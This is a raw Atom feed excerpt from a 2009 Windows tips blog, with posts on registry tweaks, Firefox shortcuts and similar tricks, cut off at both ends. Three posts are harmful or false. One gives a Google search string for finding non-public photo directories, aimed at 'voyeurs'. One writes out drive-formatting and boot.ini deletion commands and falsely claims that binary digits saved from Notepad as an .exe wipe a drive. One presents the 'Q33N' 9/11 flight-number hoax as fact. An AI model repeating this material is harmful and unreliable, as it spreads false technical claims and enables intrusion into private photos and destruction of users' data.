src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-2994084536272705081</id><published>2009-11-29T06:50:00.001-08:00</published><updated>2009-11-29T06:50:31.799-08:00</updated><title type='text'>Amazing Google Trick To Find Private Pictures</title><content type='html'>Maybe you are a "voyeur".&lt;br /&gt;&lt;br /&gt;Maybe you need some pictures for your school work.&lt;br /&gt;&lt;br /&gt;Of course you can go to a dedicated website where you can find lot of free pictures.&lt;br /&gt;&lt;br /&gt;But you can also dig some private pictures directories.&lt;br /&gt;&lt;br /&gt;Try this little code in Google, you may find lot of Non public pictures&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;intitle:index.of +"Indexed by Apache::Gallery"  &lt;br /&gt;&lt;br /&gt;You can also narow your search by adding a word at the end, for example:&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;intitle:index.of +"Indexed by Apache::Gallery" +dbilla  &lt;br /&gt;&lt;br /&gt;Maybe some of you guys use Apache Gallery for your own private pictures.&lt;br /&gt;&lt;br /&gt;If you want to verify if your own private pictures ares indexed, just paste this code in Google.&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;www.YourSite intitle:index.of +"Indexed by Apache::Gallery"  &lt;br /&gt;&lt;br /&gt;(Replace YourSite by the server hosting your pictures (your URL.)&lt;br /&gt;&lt;br /&gt;Example&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;www.courirpouraider.ch intitle:index.of +"Indexed by Apache::Gallery"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-2994084536272705081?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/2994084536272705081/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/amazing-google-trick-to-find-private.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2994084536272705081'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2994084536272705081'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/amazing-google-trick-to-find-private.html' title='Amazing Google Trick To Find Private Pictures'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8330654881271971454</id><published>2009-11-29T06:49:00.001-08:00</published><updated>2009-11-29T06:49:52.635-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Notepad'/><title type='text'>how to format ur drives using notepad(just know it)</title><content type='html'>&lt;span style="color: red;"&gt;Dont try this!!! As soon as you save and Run it.. You can loose all your Data ... This is just for information... Very Dangerous trick&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Note: Using the information below is very risky and may cause permanent loss of data, proceed with caution.&lt;br /&gt;&lt;br /&gt;Step 1.&lt;br /&gt;Write The Following In Notepad Exactly as it says&lt;br /&gt;&lt;br /&gt;01001011000111110010010101010101010000011111100000&lt;br /&gt;&lt;br /&gt;Step 2.&lt;br /&gt;Save as a .EXE -any name will do&lt;br /&gt;&lt;br /&gt;Step 3.&lt;br /&gt;Run the .exe&lt;br /&gt;&lt;br /&gt;Alternative method:&lt;br /&gt;&lt;br /&gt;format c:\ /Q/X -- this will format your drive c:&lt;br /&gt;01100110011011110111001001101101011000010111010000 10000001&lt;br /&gt;1000110011101001011100&lt;br /&gt;&lt;br /&gt;0010000000101111010100010010111101011000&lt;br /&gt;&lt;br /&gt;format d:\ /Q/X -- this will format your drive d:&lt;br /&gt;01100110011011110111001001101101011000010111010000 100000011&lt;br /&gt;001000011101001011100&lt;br /&gt;&lt;br /&gt;0010000000101111010100010010111101011000&lt;br /&gt;&lt;br /&gt;format a:\ /Q/X -- this will format your drive a:&lt;br /&gt;01100110011011110111001001101101011000010111010000 1000000&lt;br /&gt;11000010011101001011100&lt;br /&gt;&lt;br /&gt;0010000000101111010100010010111101011000&lt;br /&gt;&lt;br /&gt;del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.&lt;br /&gt;&lt;br /&gt;01100100011001010110110000100000001011110100011000 1011110101&lt;br /&gt;00110010111101010001&lt;br /&gt;&lt;br /&gt;00100000011000110011101001011100011000100&lt;br /&gt;110111101101111011101000010111001101001&lt;br /&gt;&lt;br /&gt;011011100110100&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8330654881271971454?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8330654881271971454/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-format-ur-drives-using.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8330654881271971454'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8330654881271971454'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-format-ur-drives-using.html' title='how to format ur drives using notepad(just know it)'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-3255927019381824726</id><published>2009-11-29T06:48:00.001-08:00</published><updated>2009-11-29T06:48:39.208-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Open Multiple instances of Yahoo Messenger</title><content type='html'>Today while browsing, I found a hack about the most popular instant messenger - Yahoo Messenger. This Simple Hack allows you to Run multiple instances (more then one) of Yahoo Messenger simultaneously on one PC.&lt;br /&gt;&lt;br /&gt;YAHOO MESSENGER&lt;br /&gt;&lt;br /&gt;* Go to Start &gt;&gt; Run &gt;&gt;&lt;br /&gt;* Type regedit &gt;&gt; press Enter&lt;br /&gt;* Go to HKEY_CURRENT_USER &gt;&gt; Software &gt;&gt; Yahoo &gt;&gt; pager &gt;&gt; Test&lt;br /&gt;* Then Right click on test &gt;&gt; choose New &gt;&gt; Dword value .&lt;br /&gt;* Rename it as ‘Plural’.&lt;br /&gt;* Double click it &gt;&gt; assign a decimal value of 1.&lt;br /&gt;* Close the registry and Restart yahoo messenger.&lt;br /&gt;&lt;br /&gt;Hey Its All Done!! Now you can open ‘N’ instances of yahoo messenger and login into each from different yahoo ID.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-3255927019381824726?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/3255927019381824726/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/open-multiple-instances-of-yahoo.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3255927019381824726'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3255927019381824726'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/open-multiple-instances-of-yahoo.html' title='Open Multiple instances of Yahoo Messenger'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-6836432627668835735</id><published>2009-11-29T06:47:00.003-08:00</published><updated>2009-11-29T06:47:58.095-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><title type='text'>Create Your Own Logon Message</title><content type='html'>Create Your Own Logon Message You can create a message that will appear when you log on to your computer. &lt;br /&gt;&lt;br /&gt;Click Start, click Run, type regedit, and then click OK. In the Registry Editor, drill down to the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon &lt;br /&gt;&lt;br /&gt;Right-click LegalNoticeCaption, &lt;br /&gt;click Modify,&lt;br /&gt;&lt;br /&gt;type My Windows XP Machine, and then click OK. &lt;br /&gt;&lt;br /&gt;Right-click LegalNoticeText, click Modify, and then type your message.&lt;br /&gt;&lt;br /&gt;Close the editor and your new message will appear at every log on.&lt;br /&gt;&lt;br /&gt;This tip applies to computers that are part of a domain. &lt;br /&gt;&lt;br /&gt;For stand-alone or peer-to-peer networks, the custom screen appears just before the Welcome screen. &lt;br /&gt;&lt;br /&gt;You may need to have an administrator account on your computer to make changes to the registry. Incorrectly editing the registry may severely damage your system.&lt;br /&gt;&lt;br /&gt;At the very least, you should back up any valued data on the computer before making changes to the registry.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-6836432627668835735?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/6836432627668835735/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/create-your-own-logon-message.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6836432627668835735'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6836432627668835735'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/create-your-own-logon-message.html' title='Create Your Own Logon Message'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1368273099953438278</id><published>2009-11-29T06:47:00.001-08:00</published><updated>2009-11-29T06:47:21.257-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='Vista'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>Hidden bluetooth software in XP and vista</title><content type='html'>Now you don't need to install any software for your bluetooth device.&lt;br /&gt;you don't know but you already had it in ur window xp nd vista&lt;br /&gt;it can be used as:-&lt;br /&gt;&lt;br /&gt;1.open run command&lt;br /&gt;2.now type "fsquirt" without quotes&lt;br /&gt;3.now just select whether u want 2 send or receive any file very easy.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1368273099953438278?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1368273099953438278/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/hidden-bluetooth-software-in-xp-and.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1368273099953438278'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1368273099953438278'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/hidden-bluetooth-software-in-xp-and.html' title='Hidden bluetooth software in XP and vista'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-2577091232563359376</id><published>2009-11-29T06:46:00.003-08:00</published><updated>2009-11-29T06:46:48.417-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Rename recycle bin</title><content type='html'>To change the name of the Recycle Bin desktop icon, click Start then goto Run, write Regedit and press Enter. It opens Registry Editor. Now in Registry Editor go to:&lt;br /&gt;&lt;br /&gt;HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-1&lt;br /&gt;01B-9F08-00AA002F954E}&lt;br /&gt;and change the name "Recycle Bin" to whatever you want (don't type any quotes).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-2577091232563359376?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/2577091232563359376/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/rename-recycle-bin.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2577091232563359376'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2577091232563359376'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/rename-recycle-bin.html' title='Rename recycle bin'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-4240917610037419258</id><published>2009-11-29T06:46:00.001-08:00</published><updated>2009-11-29T06:46:01.263-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><category scheme='http://www.blogger.com/atom/ns#' term='shortcut'/><title type='text'>Shortcuts for Mozilla Firefox</title><content type='html'>CTRL + A Select all text on a webpage&lt;br /&gt;CTRL + B Open the Bookmarks sidebar&lt;br /&gt;CTRL + C Copy the selected text to the Windows clipboard&lt;br /&gt;CTRL + D Bookmark the current webpage&lt;br /&gt;CTRL + F Find text within the current webpage&lt;br /&gt;CTRL + G Find more text within the same webpage&lt;br /&gt;CTRL + H Opens the webpage History sidebar&lt;br /&gt;CTRL + I Open the Bookmarks sidebar&lt;br /&gt;CTRL + J Opens the Download Dialogue Box&lt;br /&gt;CTRL + K Places the cursor in the Web Search box ready to type your search&lt;br /&gt;CTRL + L Places the cursor into the URL box ready to type a website address&lt;br /&gt;CTRL + M Opens your mail program (if you have one) to create a new email message&lt;br /&gt;CTRL + N Opens a new Firefox window&lt;br /&gt;CTRL + O Open a local file&lt;br /&gt;CTRL + P Print the current webpage&lt;br /&gt;CTRL + R Reloads the current webpage&lt;br /&gt;CTRL + S Save the current webpage on your PC&lt;br /&gt;CTRL + T Opens a new Firefox Tab&lt;br /&gt;CTRL + U View the page source of the current webpage&lt;br /&gt;CTRL + V Paste the contents of the Windows clipboard&lt;br /&gt;CTRL + W Closes the current Firefox Tab or Window (if more than one tab is open)&lt;br /&gt;CTRL + X Cut the selected text&lt;br /&gt;CTRL + Z Undo the last action&lt;br /&gt;&lt;br /&gt;Windows Keyboard Shortcuts for Mozilla Firefox&lt;br /&gt;F1 Opens Firefox help&lt;br /&gt;F3 Find more text within the same webpage&lt;br /&gt;F5 Reload the current webpage&lt;br /&gt;F6 Toggles the cursor between the address/URL input box and the current webpage&lt;br /&gt;F7 Toggles Caret Browsing on and off. Used to be able to select text on a webpage with the keyboard&lt;br /&gt;F11 Switch to Full Screen mode&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-4240917610037419258?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/4240917610037419258/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/shortcuts-for-mozilla-firefox.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4240917610037419258'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4240917610037419258'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/shortcuts-for-mozilla-firefox.html' title='Shortcuts for Mozilla Firefox'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-3932466672256292030</id><published>2009-11-29T06:45:00.001-08:00</published><updated>2009-11-29T06:45:33.102-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Increase XP folder setting</title><content type='html'>Windows remembers 400 folder settings. When that number is reached some settings aren't retained any longer. You can change this to 8000 by adding this edit to the registry.&lt;br /&gt;&lt;br /&gt;1. Copy the following (everything in the box) into notepdad.&lt;br /&gt;&lt;br /&gt;QUOTE&lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;&lt;br /&gt;[-HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell NoRoam\BagMRU]&lt;br /&gt;[-HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell NoRoam\Bags]&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell]&lt;br /&gt;"BagMRU Size"=dword:00001f40&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell NoRoam]&lt;br /&gt;"BagMRU Size"=dword:00001f40&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer]&lt;br /&gt;"NoSaveSettings"=dword:00000000&lt;br /&gt;&lt;br /&gt;2. Save the file as folder8000.reg&lt;br /&gt;&lt;br /&gt;3. Double click the file to import into your registry&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-3932466672256292030?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/3932466672256292030/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/increase-xp-folder-setting.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3932466672256292030'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3932466672256292030'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/increase-xp-folder-setting.html' title='Increase XP folder setting'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8383567946192213965</id><published>2009-11-29T06:44:00.001-08:00</published><updated>2009-11-29T06:44:46.755-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>disable error reporting</title><content type='html'>1. Open Control Panel&lt;br /&gt;2. Click on Performance and Maintenance.&lt;br /&gt;3. Click on System.&lt;br /&gt;4. Then click on the Advanced tab&lt;br /&gt;5. Click on the error-reporting button on the bottom of the windows.&lt;br /&gt;6. Select Disable error reporting.&lt;br /&gt;7. Click OK&lt;br /&gt;8. Click OK&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8383567946192213965?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8383567946192213965/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/disable-error-reporting.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8383567946192213965'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8383567946192213965'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/disable-error-reporting.html' title='disable error reporting'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8842302105920828224</id><published>2009-11-29T06:42:00.003-08:00</published><updated>2009-11-29T06:42:48.207-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Notepad'/><title type='text'>Notepad Knew About 9/11/2001 !</title><content type='html'>Amazing thing but true , Notepad knew about 9/11/2001 ! &lt;br /&gt;The flight number which hit the WTC in New York was Q33N ! &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;See it yourself :-&lt;br /&gt;&lt;br /&gt;1. Open Notepad&lt;br /&gt;2. Type : Q33N&lt;br /&gt;3. Now, go to Format menu&lt;br /&gt;4. Choose Font.&lt;br /&gt;5. Now, change the size to '72'&lt;br /&gt;6. Now, change the font to 'Wingdings'&lt;br /&gt;7. See what is displayed !&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8842302105920828224?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8842302105920828224/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/notepad-knew-about-9112001.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8842302105920828224'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8842302105920828224'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/notepad-knew-about-9112001.html' title='Notepad Knew About 9/11/2001 !'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1574782429449399095</id><published>2009-11-29T06:42:00.001-08:00</published><updated>2009-11-29T06:42:21.515-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><title type='text'>PDF Trick</title><content type='html'>Now u can listen to wats there in a pdf document instead of reading the whole document....&lt;br /&gt;Try out the following key&lt;br /&gt;&lt;br /&gt;combinations for Acrobat 6.0 &amp; 7.0:&lt;br /&gt;- ctrl+ shift + b ---&gt; To hear the whole document&lt;br /&gt;ctrl + shift + v ---&gt; To hear only the page&lt;br /&gt;ctrl + shift + c ---&gt; To resume&lt;br /&gt;ctrl + shift + e ---&gt; To stop&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1574782429449399095?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1574782429449399095/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/pdf-trick.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1574782429449399095'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1574782429449399095'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/pdf-trick.html' title='PDF Trick'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-7556560997041065405</id><published>2009-11-29T06:41:00.002-08:00</published><updated>2009-11-29T06:41:43.457-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Hacking Windows SEND TO MENU</title><content type='html'>How often do you copy songs from a CD? Or some photos from a CD?&lt;br /&gt;&lt;br /&gt;What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. Customize your SEND TO MENU.&lt;br /&gt;&lt;br /&gt;This sounds simple and you can do it in less than sixty seconds.&lt;br /&gt;You can create your own BASKET.&lt;br /&gt;First you’ll need access to hidden files. So change your view settings to make all hidden files visible.&lt;br /&gt;Tools -&gt; folder options -&gt; view (tab) and select the show hidden files and folders.&lt;br /&gt;go to parent drive:/documents and settings/(user name)/send to&lt;br /&gt;&lt;br /&gt;Open up my computer and locate your most used folders.&lt;br /&gt;&lt;br /&gt;Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.&lt;br /&gt;&lt;br /&gt;Right click -&gt; send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER&lt;br /&gt;&lt;br /&gt;Copy the most used folder and go to SEND TO FOLDER and right click -&gt; paste shortcut.&lt;br /&gt;&lt;br /&gt;Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.&lt;br /&gt;&lt;br /&gt;5. DONE&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-7556560997041065405?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/7556560997041065405/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/hacking-windows-send-to-menu.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7556560997041065405'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7556560997041065405'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/hacking-windows-send-to-menu.html' title='Hacking Windows SEND TO MENU'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-572495114168574998</id><published>2009-11-29T06:41:00.000-08:00</published><updated>2009-11-29T06:41:05.579-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='registry entry'/><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>Disable Turn Off Option and ALT+F4 option</title><content type='html'>REGEDIT-&gt;HKEY_CURRENT_USER-&gt;SOFTWARE-&gt;MICROSOFT-&gt;WINDOWS-&gt;POLICIES-&gt;EXPLORER THEN GO TO RIGHT SIDE AND BY RIGHT CLICK OF UR MOUSE CREATE NEW DWORD VALUE WITH NAME NoClose and after creating click on it and give Value Data 1.&lt;br /&gt;&lt;br /&gt;And Reboot your pc ..now your Turn Off option is disabled ..to Enable it again ..go to that directory by regedit ..and simply delete that created NoClose and Log Off Your User and Log in again ..your Turn off Again Working&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-572495114168574998?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/572495114168574998/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/disable-turn-off-option-and-altf4.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/572495114168574998'/><link rel='self' type='application/atom+xml' 